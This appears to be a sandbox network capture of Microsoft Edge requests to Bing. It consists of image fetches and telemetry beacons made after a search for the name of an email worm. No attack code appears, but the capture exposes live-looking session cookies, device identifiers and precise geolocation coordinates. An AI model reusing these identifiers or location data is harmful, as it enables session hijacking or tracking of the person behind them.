user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
sec-fetch-site: same-site
sec-fetch-mode: no-cors
sec-fetch-dest: image
referer: https://www.bing.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: MUID=151CAB4AF5806A13125EBEE7F4A86B5E
cookie: _EDGE_S=F=1&SID=24C008279C1E694D33C41D8A9D3668C7
cookie: _EDGE_V=1
cookie: _SS=PC=U531&SID=24C008279C1E694D33C41D8A9D3668C7
cookie: SRCHD=AF=ANAB01
cookie: SRCHUID=V=2&GUID=575A309FEDF94F12B0494DBAB9C5DE96&dmnchg=1
cookie: SRCHUSR=DOB=20250312
cookie: ak_bmsc=460F9CF86D91FE2797181D5F9BF82436~000000000000000000000000000000~YAAQ149lX3EKJoaVAQAA7Go2iBusobvMjCt1a91fQugVp/azdtYg1cTblOvURERa6llqS9JxqWcm3ouWwSFcZ8Bne5/giyec+AvEw7Eyrkh4FcOwG9mWFJNwafhEcf5Re6ZI03jpRsnzMmSI/EbvFW/edFHoN7a12fHuhKsbnm23TBwnYfd0/7qRY65rp2M5zDdp/uRRnOJX72sLce+UT1VECXNCf9pgaxEFjNAFRlw8CrLGwWGoTo2sQwtnqGM8VahMHAuGonHuvBCenFF6eIqs++ZxS5YN+XMKXqTOaH/uT58z5M0FC40qfKOCwXX8SXHM76RAnKPqfw0gOtCDf5Dwhgp03XCOJf/PI0iHxHVbShJZyBVvwdrDtPQ39zX/uNraQHTVuARK
cookie: SRCHHPGUSR=SRCHLANG=en&DM=0&BRW=M&BRH=S&CW=1280&CH=601&SCW=1263&SCH=2731&DPR=1.0&UTC=0&PV=10.0
cookie: USRLOC=HS=1&ELOC=LAT=53.5682487487793|LON=-2.491116523742676|N=Bolton%2C%20Greater%20Manchester|ELT=4|

Response

HTTP/2.0 200

content-length: 0
access-control-allow-origin: *
date: Wed, 12 Mar 2025 02:37:03 GMT
alt-svc: h3=":443"; ma=93600
x-cdn-traceid: 0.d78f655f.1741747023.32df3cb
GET

https://th.bing.com/th?id=ODLS.b2099a11-ca12-45ce-bede-5df940e38a48&w=32&h=32&qlt=99&pcl=fffffa&o=6&pid=1.2

msedge.exe

Remote address:

88.221.135.33:443

Request

GET /th?id=ODLS.b2099a11-ca12-45ce-bede-5df940e38a48&w=32&h=32&qlt=99&pcl=fffffa&o=6&pid=1.2 HTTP/2.0
host: th.bing.com
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Microsoft Edge";v="90"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
sec-fetch-site: same-site
sec-fetch-mode: no-cors
sec-fetch-dest: image
referer: https://www.bing.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: MUID=151CAB4AF5806A13125EBEE7F4A86B5E
cookie: _EDGE_S=F=1&SID=24C008279C1E694D33C41D8A9D3668C7
cookie: _EDGE_V=1
cookie: _SS=PC=U531&SID=24C008279C1E694D33C41D8A9D3668C7
cookie: SRCHD=AF=ANAB01
cookie: SRCHUID=V=2&GUID=575A309FEDF94F12B0494DBAB9C5DE96&dmnchg=1
cookie: SRCHUSR=DOB=20250312
cookie: ak_bmsc=460F9CF86D91FE2797181D5F9BF82436~000000000000000000000000000000~YAAQ149lX3EKJoaVAQAA7Go2iBusobvMjCt1a91fQugVp/azdtYg1cTblOvURERa6llqS9JxqWcm3ouWwSFcZ8Bne5/giyec+AvEw7Eyrkh4FcOwG9mWFJNwafhEcf5Re6ZI03jpRsnzMmSI/EbvFW/edFHoN7a12fHuhKsbnm23TBwnYfd0/7qRY65rp2M5zDdp/uRRnOJX72sLce+UT1VECXNCf9pgaxEFjNAFRlw8CrLGwWGoTo2sQwtnqGM8VahMHAuGonHuvBCenFF6eIqs++ZxS5YN+XMKXqTOaH/uT58z5M0FC40qfKOCwXX8SXHM76RAnKPqfw0gOtCDf5Dwhgp03XCOJf/PI0iHxHVbShJZyBVvwdrDtPQ39zX/uNraQHTVuARK
cookie: SRCHHPGUSR=SRCHLANG=en&DM=0&BRW=M&BRH=S&CW=1280&CH=601&SCW=1263&SCH=2731&DPR=1.0&UTC=0&PV=10.0
cookie: USRLOC=HS=1&ELOC=LAT=53.5682487487793|LON=-2.491116523742676|N=Bolton%2C%20Greater%20Manchester|ELT=4|

Response

HTTP/2.0 200

content-type: image/png
access-control-allow-origin: *
access-control-allow-headers: *
access-control-allow-methods: GET, POST, OPTIONS
timing-allow-origin: *
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingth&ndcParam=QUZE"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
content-length: 944
cache-control: public, max-age=1516600
date: Wed, 12 Mar 2025 02:37:03 GMT
x-cache: TCP_MEM_HIT from a95-101-143-215.deploy.akamaitechnologies.com (AkamaiGHost/22.0.0-bb2a2774a48042877147cbed2bad8ca6) (-)
alt-svc: h3=":443"; ma=93600
akamai-grn: 0.d78f655f.1741747023.32df3d8
x-check-cacheable: YES
GET

https://www.bing.com/fd/ls/l?IG=C6B6495D728647ADA3098FCFDAE1CBA9&CID=151CAB4AF5806A13125EBEE7F4A86B5E&Type=Event.ClientInst&DATA=[{%22T%22:%22CI.SERPSB%22,%22FID%22:%22CI%22,%22Name%22:%22CharCount%22,%22Text%22:%2220%22,%22SDK%22:%22SJ%22}]

msedge.exe

Remote address:

88.221.135.33:443

Request

GET /fd/ls/l?IG=C6B6495D728647ADA3098FCFDAE1CBA9&CID=151CAB4AF5806A13125EBEE7F4A86B5E&Type=Event.ClientInst&DATA=[{%22T%22:%22CI.SERPSB%22,%22FID%22:%22CI%22,%22Name%22:%22CharCount%22,%22Text%22:%2220%22,%22SDK%22:%22SJ%22}] HTTP/2.0
host: www.bing.com
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Microsoft Edge";v="90"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
sec-ch-ua-arch: "x86"
sec-ch-ua-full-version: "90.0.818.66"
sec-ch-ua-platform-version: "10.0"
ect: 4g
sec-ch-ua-model:
sec-ch-ua-platform: "Windows"
accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
sec-fetch-site: same-origin
sec-fetch-mode: no-cors
sec-fetch-dest: image
referer: https://www.bing.com/search?q=Email-Worm%2FScare.hta&aqs=edge..69i57j69i58.240747624j0j0&FORM=ANAB01&PC=U531
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: MUID=151CAB4AF5806A13125EBEE7F4A86B5E
cookie: _EDGE_S=F=1&SID=24C008279C1E694D33C41D8A9D3668C7
cookie: _EDGE_V=1
cookie: _SS=PC=U531&SID=24C008279C1E694D33C41D8A9D3668C7
cookie: SRCHD=AF=ANAB01
cookie: SRCHUID=V=2&GUID=575A309FEDF94F12B0494DBAB9C5DE96&dmnchg=1
cookie: SRCHUSR=DOB=20250312
cookie: ak_bmsc=460F9CF86D91FE2797181D5F9BF82436~000000000000000000000000000000~YAAQ149lX3EKJoaVAQAA7Go2iBusobvMjCt1a91fQugVp/azdtYg1cTblOvURERa6llqS9JxqWcm3ouWwSFcZ8Bne5/giyec+AvEw7Eyrkh4FcOwG9mWFJNwafhEcf5Re6ZI03jpRsnzMmSI/EbvFW/edFHoN7a12fHuhKsbnm23TBwnYfd0/7qRY65rp2M5zDdp/uRRnOJX72sLce+UT1VECXNCf9pgaxEFjNAFRlw8CrLGwWGoTo2sQwtnqGM8VahMHAuGonHuvBCenFF6eIqs++ZxS5YN+XMKXqTOaH/uT58z5M0FC40qfKOCwXX8SXHM76RAnKPqfw0gOtCDf5Dwhgp03XCOJf/PI0iHxHVbShJZyBVvwdrDtPQ39zX/uNraQHTVuARK
cookie: MUIDB=151CAB4AF5806A13125EBEE7F4A86B5E
cookie: SRCHHPGUSR=SRCHLANG=en&DM=0&BRW=M&BRH=S&CW=1280&CH=601&SCW=1263&SCH=2731&DPR=1.0&UTC=0&PV=10.0
cookie: USRLOC=HS=1&ELOC=LAT=53.5682487487793|LON=-2.491116523742676|N=Bolton%2C%20Greater%20Manchester|ELT=4|

Response

HTTP/2.0 200

content-length: 0
access-control-allow-origin: *
date: Wed, 12 Mar 2025 02:37:03 GMT
alt-svc: h3=":443"; ma=93600
x-cdn-traceid: 0.d78f655f.1741747023.32df46f
GET

https://www.bing.com/fd/ls/l?IG=C6B6495D728647ADA3098FCFDAE1CBA9&CID=151CAB4AF5806A13125EBEE7F4A86B5E&Type=Event.ClientInst&DATA=[{%22T%22:%22CI.SERPSB%22,%22FID%22:%22CI%22,%22Name%22:%22LandingRows%22,%22Text%22:%221%22,%22SDK%22:%22SJ%22}]

msedge.exe

Remote address:

88.221.135.33:443

Request

GET /fd/ls/l?IG=C6B6495D728647ADA3098FCFDAE1CBA9&CID=151CAB4AF5806A13125EBEE7F4A86B5E&Type=Event.ClientInst&DATA=[{%22T%22:%22CI.SERPSB%22,%22FID%22:%22CI%22,%22Name%22:%22LandingRows%22,%22Text%22:%221%22,%22SDK%22:%22SJ%22}] HTTP/2.0
host: www.bing.com
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Microsoft Edge";v="90"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
sec-ch-ua-arch: "x86"
sec-ch-ua-full-version: "90.0.818.66"
sec-ch-ua-platform-version: "10.0"
ect: 4g
sec-ch-ua-model:
sec-ch-ua-platform: "Windows"
accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
sec-fetch-site: same-origin
sec-fetch-mode: no-cors
sec-fetch-dest: image
referer: https://www.bing.com/search?q=Email-Worm%2FScare.hta&aqs=edge..69i57j69i58.240747624j0j0&FORM=ANAB01&PC=U531
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: MUID=151CAB4AF5806A13125EBEE7F4A86B5E
cookie: _EDGE_S=F=1&SID=24C008279C1E694D33C41D8A9D3668C7
cookie: _EDGE_V=1
cookie: _SS=PC=U531&SID=24C008279C1E694D33C41D8A9D3668C7
cookie: SRCHD=AF=ANAB01
cookie: SRCHUID=V=2&GUID=575A309FEDF94F12B0494DBAB9C5DE96&dmnchg=1
cookie: SRCHUSR=DOB=20250312
cookie: ak_bmsc=460F9CF86D91FE2797181D5F9BF82436~000000000000000000000000000000~YAAQ149lX3EKJoaVAQAA7Go2iBusobvMjCt1a91fQugVp/azdtYg1cTblOvURERa6llqS9JxqWcm3ouWwSFcZ8Bne5/giyec+AvEw7Eyrkh4FcOwG9mWFJNwafhEcf5Re6ZI03jpRsnzMmSI/EbvFW/edFHoN7a12fHuhKsbnm23TBwnYfd0/7qRY65rp2M5zDdp/uRRnOJX72sLce+UT1VECXNCf9pgaxEFjNAFRlw8CrLGwWGoTo2sQwtnqGM8VahMHAuGonHuvBCenFF6eIqs++ZxS5YN+XMKXqTOaH/uT58z5M0FC40qfKOCwXX8SXHM76RAnKPqfw0gOtCDf5Dwhgp03XCOJf/PI0iHxHVbShJZyBVvwdrDtPQ39zX/uNraQHTVuARK
cookie: MUIDB=151CAB4AF5806A13125EBEE7F4A86B5E
cookie: SRCHHPGUSR=SRCHLANG=en&DM=0&BRW=M&BRH=S&CW=1280&CH=601&SCW=1263&SCH=2731&DPR=1.0&UTC=0&PV=10.0
cookie: USRLOC=HS=1&ELOC=LAT=53.5682487487793|LON=-2.491116523742676|N=Bolton%2C%20Greater%20Manchester|ELT=4|

Response

HTTP/2.0 200

content-length: 0
access-control-allow-origin: *
date: Wed, 12 Mar 2025 02:37:03 GMT
alt-svc: h3=":443"; ma=93600
x-cdn-traceid: 0.d78f655f.1741747023.32df470
GET

https://www.bing.com/images/sbi?mmasync=1&ig=C6B6495D728647ADA3098FCFDAE1CBA9&iid=.5100&ptn=Web&ep=0&iconpl=1

msedge.exe

Remote address:

88.221.135.33:443

Request

GET /images/sbi?mmasync=1&ig=C6B6495D728647ADA3098FCFDAE1CBA9&iid=.5100&ptn=Web&ep=0&iconpl=1 HTTP/2.0
host: www.bing.com
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Microsoft Edge";v="90"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
sec-ch-ua-arch: "x86"
sec-ch-ua-full-version: "90.0.818.66"
sec-ch-ua-platform-version: "10.0"
ect: 4g
sec-ch-ua-model:
sec-ch-ua-platform: "Windows"
accept: */*
sec-fetch-site: same-origin
sec-fetch-mode: cors
sec-fetch-dest: empty
referer: https://www.bing.com/search?q=Email-Worm%2FScare.hta&aqs=edge..69i57j69i58.240747624j0j0&FORM=ANAB01&PC=U531
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: MUID=151CAB4AF5806A13125EBEE7F4A86B5E
cookie: _EDGE_S=F=1&SID=24C008279C1E694D33C41D8A9D3668C7
cookie: _EDGE_V=1
cookie: _SS=PC=U531&SID=24C008279C1E694D33C41D8A9D3668C7
cookie: SRCHD=AF=ANAB01
cookie: SRCHUID=V=2&GUID=575A309FEDF94F12B0494DBAB9C5DE96&dmnchg=1
cookie: SRCHUSR=DOB=20250312
cookie: ak_bmsc=460F9CF86D91FE2797181D5F9BF82436~000000000000000000000000000000~YAAQ149lX3EKJoaVAQAA7Go2iBusobvMjCt1a91fQugVp/azdtYg1cTblOvURERa6llqS9JxqWcm3ouWwSFcZ8Bne5/giyec+AvEw7Eyrkh4FcOwG9mWFJNwafhEcf5Re6ZI03jpRsnzMmSI/EbvFW/edFHoN7a12fHuhKsbnm23TBwnYfd0/7qRY65rp2M5zDdp/uRRnOJX72sLce+UT1VECXNCf9pgaxEFjNAFRlw8CrLGwWGoTo2sQwtnqGM8VahMHAuGonHuvBCenFF6eIqs++ZxS5YN+XMKXqTOaH/uT58z5M0FC40qfKOCwXX8SXHM76RAnKPqfw0gOtCDf5Dwhgp03XCOJf/PI0iHxHVbShJZyBVvwdrDtPQ39zX/uNraQHTVuARK
cookie: MUIDB=151CAB4AF5806A13125EBEE7F4A86B5E
cookie: SRCHHPGUSR=SRCHLANG=en&DM=0&BRW=M&BRH=S&CW=1280&CH=601&SCW=1263&SCH=2731&DPR=1.0&UTC=0&PV=10.0
cookie: USRLOC=HS=1&ELOC=LAT=53.5682487487793|LON=-2.491116523742676|N=Bolton%2C%20Greater%20Manchester|ELT=4|

Response

HTTP/2.0 200

content-length: 0
access-control-allow-origin: *
date: Wed, 12 Mar 2025 02:37:03 GMT
alt-svc: h3=":443"; ma=93600
x-cdn-traceid: 0.d78f655f.1741747023.32df4a1
GET

https://www.bing.com/fd/ls/l?IG=C6B6495D728647ADA3098FCFDAE1CBA9&CID=151CAB4AF5806A13125EBEE7F4A86B5E&TYPE=Event.ClientInst&DATA=%5B%7B%22Namespace%22%3A%22SearchHarder%22%2C%22SDK%22%3A%22V3-L%22%2C%22T%22%3A%22CI.Info%22%2C%22TS%22%3A1741747022777%2C%22Name%22%3A%22ButtonVisible%22%2C%22FID%22%3A%22SearchHarderEntryPoint%22%7D%2C%7B%22SDK%22%3A%22V3-L%22%2C%22T%22%3A%22CI.ClientInst%22%2C%22TS%22%3A1741747022953%2C%22Name%22%3A%22OrgId%22%2C%22FID%22%3A%22NoSignInAttempt%22%7D%2C%7B%22Time%22%3A1266%2C%22time%22%3A1267%2C%22SDK%22%3A%22V3-L%22%2C%22T%22%3A%22CI.Latency%22%2C%22TS%22%3A1741747022957%2C%22Name%22%3A%22Loaded%22%2C%22FID%22%3A%22HP%22%7D%5D

msedge.exe

Remote address:

88.221.135.33:443

Request

GET /fd/ls/l?IG=C6B6495D728647ADA3098FCFDAE1CBA9&CID=151CAB4AF5806A13125EBEE7F4A86B5E&TYPE=Event.ClientInst&DATA=%5B%7B%22Namespace%22%3A%22SearchHarder%22%2C%22SDK%22%3A%22V3-L%22%2C%22T%22%3A%22CI.Info%22%2C%22TS%22%3A1741747022777%2C%22Name%22%3A%22ButtonVisible%22%2C%22FID%22%3A%22SearchHarderEntryPoint%22%7D%2C%7B%22SDK%22%3A%22V3-L%22%2C%22T%22%3A%22CI.ClientInst%22%2C%22TS%22%3A1741747022953%2C%22Name%22%3A%22OrgId%22%2C%22FID%22%3A%22NoSignInAttempt%22%7D%2C%7B%22Time%22%3A1266%2C%22time%22%3A1267%2C%22SDK%22%3A%22V3-L%22%2C%22T%22%3A%22CI.Latency%22%2C%22TS%22%3A1741747022957%2C%22Name%22%3A%22Loaded%22%2C%22FID%22%3A%22HP%22%7D%5D HTTP/2.0
host: www.bing.com
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Microsoft Edge";v="90"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
sec-ch-ua-arch: "x86"
sec-ch-ua-full-version: "90.0.818.66"
sec-ch-ua-platform-version: "10.0"
ect: 4g
sec-ch-ua-model:
sec-ch-ua-platform: "Windows"
accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
sec-fetch-site: same-origin
sec-fetch-mode: no-cors
sec-fetch-dest: image
referer: https://www.bing.com/search?q=Email-Worm%2FScare.hta&aqs=edge..69i57j69i58.240747624j0j0&FORM=ANAB01&PC=U531
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: MUID=151CAB4AF5806A13125EBEE7F4A86B5E
cookie: _EDGE_S=F=1&SID=24C008279C1E694D33C41D8A9D3668C7
cookie: _EDGE_V=1
cookie: _SS=PC=U531&SID=24C008279C1E694D33C41D8A9D3668C7
cookie: SRCHD=AF=ANAB01
cookie: SRCHUID=V=2&GUID=575A309FEDF94F12B0494DBAB9C5DE96&dmnchg=1
cookie: ak_bmsc=460F9CF86D91FE2797181D5F9BF82436~000000000000000000000000000000~YAAQ149lX3EKJoaVAQAA7Go2iBusobvMjCt1a91fQugVp/azdtYg1cTblOvURERa6llqS9JxqWcm3ouWwSFcZ8Bne5/giyec+AvEw7Eyrkh4FcOwG9mWFJNwafhEcf5Re6ZI03jpRsnzMmSI/EbvFW/edFHoN7a12fHuhKsbnm23TBwnYfd0/7qRY65rp2M5zDdp/uRRnOJX72sLce+UT1VECXNCf9pgaxEFjNAFRlw8CrLGwWGoTo2sQwtnqGM8VahMHAuGonHuvBCenFF6eIqs++ZxS5YN+XMKXqTOaH/uT58z5M0FC40qfKOCwXX8SXHM76RAnKPqfw0gOtCDf5Dwhgp03XCOJf/PI0iHxHVbShJZyBVvwdrDtPQ39zX/uNraQHTVuARK
cookie: MUIDB=151CAB4AF5806A13125EBEE7F4A86B5E
cookie: SRCHHPGUSR=SRCHLANG=en&DM=0&BRW=M&BRH=S&CW=1280&CH=601&SCW=1263&SCH=2731&DPR=1.0&UTC=0&PV=10.0
cookie: USRLOC=HS=1&ELOC=LAT=53.5682487487793|LON=-2.491116523742676|N=Bolton%2C%20Greater%20Manchester|ELT=4|
cookie: SRCHUSR=DOB=20250312&T=1741747022000

Response

HTTP/2.0 200

content-length: 0
access-control-allow-origin: *
date: Wed, 12 Mar 2025 02:37:03 GMT
alt-svc: h3=":443"; ma=93600
x-cdn-traceid: 0.d78f655f.1741747023.32df4a2
GET

https://www.bing.com/fd/ls/l?IG=C6B6495D728647ADA3098FCFDAE1CBA9&CID=151CAB4AF5806A13125EBEE7F4A86B5E&TYPE=Event.ClientInst&DATA=%5B%7B%22comp%22%3A%22loaded%22%2C%22time%22%3A1269%2C%22SDK%22%3A%22V3-L%22%2C%22T%22%3A%22CI.Data%22%2C%22TS%22%3A1741747022958%2C%22Name%22%3A%22speech%22%2C%22FID%22%3A%22HP%22%7D%5D

msedge.exe

Remote address:

88.221.135.33:443

Request

GET /fd/ls/l?IG=C6B6495D728647ADA3098FCFDAE1CBA9&CID=151CAB4AF5806A13125EBEE7F4A86B5E&TYPE=Event.ClientInst&DATA=%5B%7B%22comp%22%3A%22loaded%22%2C%22time%22%3A1269%2C%22SDK%22%3A%22V3-L%22%2C%22T%22%3A%22CI.Data%22%2C%22TS%22%3A1741747022958%2C%22Name%22%3A%22speech%22%2C%22FID%22%3A%22HP%22%7D%5D HTTP/2.0
host: www.bing.com
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Microsoft Edge";v="90"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
sec-ch-ua-arch: "x86"
sec-ch-ua-full-version: "90.0.818.66"
sec-ch-ua-platform-version: "10.0"
ect: 4g
sec-ch-ua-model:
sec-ch-ua-platform: "Windows"
accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
sec-fetch-site: same-origin
sec-fetch-mode: no-cors
sec-fetch-dest: image
referer: https://www.bing.com/search?q=Email-Worm%2FScare.hta&aqs=edge..69i57j69i58.240747624j0j0&FORM=ANAB01&PC=U531
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: MUID=151CAB4AF5806A13125EBEE7F4A86B5E
cookie: _EDGE_S=F=1&SID=24C008279C1E694D33C41D8A9D3668C7
cookie: _EDGE_V=1
cookie: _SS=PC=U531&SID=24C008279C1E694D33C41D8A9D3668C7
cookie: SRCHD=AF=ANAB01
cookie: SRCHUID=V=2&GUID=575A309FEDF94F12B0494DBAB9C5DE96&dmnchg=1
cookie: ak_bmsc=460F9CF86D91FE2797181D5F9BF82436~000000000000000000000000000000~YAAQ149lX3EKJoaVAQAA7Go2iBusobvMjCt1a91fQugVp/azdtYg1cTblOvURERa6llqS9JxqWcm3ouWwSFcZ8Bne5/giyec+AvEw7Eyrkh4FcOwG9mWFJNwafhEcf5Re6ZI03jpRsnzMmSI/EbvFW/edFHoN7a12fHuhKsbnm23TBwnYfd0/7qRY65rp2M5zDdp/uRRnOJX72sLce+UT1VECXNCf9pgaxEFjNAFRlw8CrLGwWGoTo2sQwtnqGM8VahMHAuGonHuvBCenFF6eIqs++ZxS5YN+XMKXqTOaH/uT58z5M0FC40qfKOCwXX8SXHM76RAnKPqfw0gOtCDf5Dwhgp03XCOJf/PI0iHxHVbShJZyBVvwdrDtPQ39zX/uNraQHTVuARK
cookie: MUIDB=151CAB4AF5806A13125EBEE7F4A86B5E
cookie: SRCHHPGUSR=SRCHLANG=en&DM=0&BRW=M&BRH=S&CW=1280&CH=601&SCW=1263&SCH=2731&DPR=1.0&UTC=0&PV=10.0
cookie: USRLOC=HS=1&ELOC=LAT=53.5682487487793|LON=-2.491116523742676|N=Bolton%2C%20Greater%20Manchester|ELT=4|
cookie: SRCHUSR=DOB=20250312&T=1741747022000

Response

HTTP/2.0 200

content-length: 16194
content-type: text/html; charset=utf-8
cache-control: private
content-encoding: br
vary: Accept-Encoding
x-eventid: 67d0f34fd0064b5786a28b9f577d29c0
accept-ch: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Full-Version, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, ECT, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UA
useragentreductionoptout: A7kgTC5xdZ2WIVGZEfb1hUoNuvjzOZX3VIV/BA6C18kQOOF50Q0D3oWoAm49k3BQImkujKILc7JmPysWk3CSjwUAAACMeyJvcmlnaW4iOiJodHRwczovL3d3dy5iaW5nLmNvbTo0NDMiLCJmZWF0dXJlIjoiU2VuZEZ1bGxVc2VyQWdlbnRBZnRlclJlZHVjdGlvbiIsImV4cGlyeSI6MTY4NDg4NjM5OSwiaXNTdWJkb21haW4iOnRydWUsImlzVGhpcmRQYXJ0eSI6dHJ1ZX0=
content-security-policy: script-src https: 'strict-dynamic' 'report-sample' 'wasm-unsafe-eval' 'nonce-h7GyRmWLJ0OMTRgir3+f9pqXaKGYS5xcrCuK8wIsPzI='; base-uri 'self';report-to csp-endpoint
report-to: {"group":"csp-endpoint","max_age":86400,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingcsp"}]}
p3p: CP="NON UNI COM NAV STA LOC CURa DEVa PSAa PSDa OUR IND"
date: Wed, 12 Mar 2025 02:37:03 GMT
set-cookie: SRCHHPGUSR=SRCHLANG=en&DM=0&BRW=M&BRH=S&CW=1280&CH=601&SCW=1263&SCH=2731&DPR=1.0&UTC=0&PV=10.0; domain=.bing.com; expires=Mon, 06-Apr-2026 02:37:03 GMT; path=/; secure; SameSite=None
alt-svc: h3=":443"; ma=93600
x-cdn-traceid: 0.d78f655f.1741747023.32df491
GET

https://www.bing.com/fd/ls/l?IG=C6B6495D728647ADA3098FCFDAE1CBA9&CID=151CAB4AF5806A13125EBEE7F4A86B5E&TYPE=Event.ClientInst&DATA=%5B%7B%22micComponent%22%3A%22rendered%22%2C%22time%22%3A1269%2C%22SDK%22%3A%22V3-L%22%2C%22T%22%3A%22CI.Data%22%2C%22TS%22%3A1741747022959%2C%22Name%22%3A%22speech%22%2C%22FID%22%3A%22HP%22%7D%5D

msedge.exe

Remote address:

88.221.135.33:443

Request

GET /fd/ls/l?IG=C6B6495D728647ADA3098FCFDAE1CBA9&CID=151CAB4AF5806A13125EBEE7F4A86B5E&TYPE=Event.ClientInst&DATA=%5B%7B%22micComponent%22%3A%22rendered%22%2C%22time%22%3A1269%2C%22SDK%22%3A%22V3-L%22%2C%22T%22%3A%22CI.Data%22%2C%22TS%22%3A1741747022959%2C%22Name%22%3A%22speech%22%2C%22FID%22%3A%22HP%22%7D%5D HTTP/2.0
host: www.bing.com
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Microsoft Edge";v="90"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
sec-ch-ua-arch: "x86"
sec-ch-ua-full-version: "90.0.818.66"
sec-ch-ua-platform-version: "10.0"
ect: 4g
sec-ch-ua-model:
sec-ch-ua-platform: "Windows"
accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
sec-fetch-site: same-origin
sec-fetch-mode: no-cors
sec-fetch-dest: image
referer: https://www.bing.com/search?q=Email-Worm%2FScare.hta&aqs=edge..69i57j69i58.240747624j0j0&FORM=ANAB01&PC=U531
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: MUID=151CAB4AF5806A13125EBEE7F4A86B5E
cookie: _EDGE_S=F=1&SID=24C008279C1E694D33C41D8A9D3668C7
cookie: _EDGE_V=1
cookie: _SS=PC=U531&SID=24C008279C1E694D33C41D8A9D3668C7
cookie: SRCHD=AF=ANAB01
cookie: SRCHUID=V=2&GUID=575A309FEDF94F12B0494DBAB9C5DE96&dmnchg=1
cookie: ak_bmsc=460F9CF86D91FE2797181D5F9BF82436~000000000000000000000000000000~YAAQ149lX3EKJoaVAQAA7Go2iBusobvMjCt1a91fQugVp/azdtYg1cTblOvURERa6llqS9JxqWcm3ouWwSFcZ8Bne5/giyec+AvEw7Eyrkh4FcOwG9mWFJNwafhEcf5Re6ZI03jpRsnzMmSI/EbvFW/edFHoN7a12fHuhKsbnm23TBwnYfd0/7qRY65rp2M5zDdp/uRRnOJX72sLce+UT1VECXNCf9pgaxEFjNAFRlw8CrLGwWGoTo2sQwtnqGM8VahMHAuGonHuvBCenFF6eIqs++ZxS5YN+XMKXqTOaH/uT58z5M0FC40qfKOCwXX8SXHM76RAnKPqfw0gOtCDf5Dwhgp03XCOJf/PI0iHxHVbShJZyBVvwdrDtPQ39zX/uNraQHTVuARK
cookie: MUIDB=151CAB4AF5806A13125EBEE7F4A86B5E
cookie: SRCHHPGUSR=SRCHLANG=en&DM=0&BRW=M&BRH=S&CW=1280&CH=601&SCW=1263&SCH=2731&DPR=1.0&UTC=0&PV=10.0
cookie: USRLOC=HS=1&ELOC=LAT=53.5682487487793|LON=-2.491116523742676|N=Bolton%2C%20Greater%20Manchester|ELT=4|
cookie: SRCHUSR=DOB=20250312&T=1741747022000

Response

HTTP/2.0 200

content-length: 0
access-control-allow-origin: *
date: Wed, 12 Mar 2025 02:37:03 GMT
alt-svc: h3=":443"; ma=93600
x-cdn-traceid: 0.d78f655f.1741747023.32df4a3
POST

https://www.bing.com/rewardsapp/ncheader?ver=54406577&IID=SERP.5055&IG=C6B6495D728647ADA3098FCFDAE1CBA9

msedge.exe

Remote address:

88.221.135.33:443

Request

